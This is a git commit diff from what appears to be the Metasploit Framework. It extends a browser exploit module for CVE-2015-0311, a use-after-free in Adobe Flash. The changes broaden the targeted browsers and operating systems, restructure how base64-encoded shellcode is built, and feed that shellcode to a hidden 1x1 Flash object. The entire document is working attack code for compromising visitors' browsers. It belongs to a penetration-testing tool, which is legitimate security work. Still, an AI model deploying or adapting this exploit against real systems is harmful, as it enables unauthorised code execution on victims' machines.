Add more targets

2024-07-18 18:31:41 +02:00 · 2015-06-04 12:10:09 -05:00 · 2015-06-04 12:10:09 -05:00 · ab68d8429b
commit ab68d8429b
parent 4ee0a1438c
2 changed files with 12 additions and 16 deletions
--- a/data/exploits/CVE-2015-0311/msf.swf
+++ b/data/exploits/CVE-2015-0311/msf.swf
--- a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
@ -8,7 +8,6 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

-  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
@ -40,20 +39,21 @@ class Metasploit3 < Msf::Exploit::Remote
        {
          'DisableNops' => true
        },
-      'Platform'            => ['win', 'unix'],
-      'Arch'                => [ARCH_X86, ARCH_CMD],
+      'Platform'            => ['win', 'linux'],
+      'Arch'                => [ARCH_X86],
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :arch    => ARCH_X86,
          :os_name => lambda do |os|
              os =~ OperatingSystems::Match::LINUX ||
-              os =~ OperatingSystems::Match::WINDOWS_7
+                os =~ OperatingSystems::Match::WINDOWS_7 ||
+                os =~ OperatingSystems::Match::WINDOWS_81
            end,
          :ua_name => lambda do |ua|
            case target.name
            when 'Windows'
-              return true if ua == Msf::HttpClients::IE
+              return true if [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua)
            when 'Linux'
              return true if ua == Msf::HttpClients::FF
            end
@ -75,14 +75,12 @@ class Metasploit3 < Msf::Exploit::Remote
        [
          [ 'Windows',
            {
-              'Platform' => 'win',
-              'Arch'     => ARCH_X86
+              'Platform' => 'win'
            }
          ],
          [ 'Linux',
            {
-              'Platform' => 'unix',
-              'Arch'     => ARCH_CMD
+              'Platform' => 'linux'
            }
          ]
        ],
@ -112,15 +110,13 @@ class Metasploit3 < Msf::Exploit::Remote

  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+    target_payload = get_payload(cli, target_info)
+    b64_payload = Rex::Text.encode_base64(target_payload)
+    os_name = target_info[:os_name]

    if target.name =~ /Windows/
-      target_payload = get_payload(cli, target_info)
-      psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
-      b64_payload = Rex::Text.encode_base64(psh_payload)
      platform_id = 'win'
    elsif target.name =~ /Linux/
-      target_payload = get_payload(cli, target_info.merge(arch: ARCH_CMD))
-      b64_payload = Rex::Text.encode_base64(target_payload)
      platform_id = 'linux'
    end

@ -129,9 +125,9 @@ class Metasploit3 < Msf::Exploit::Remote
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
-    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
    <param name="Play" value="true" />
-    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>" Play="true"/>
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
    </object>
    </body>
    </html>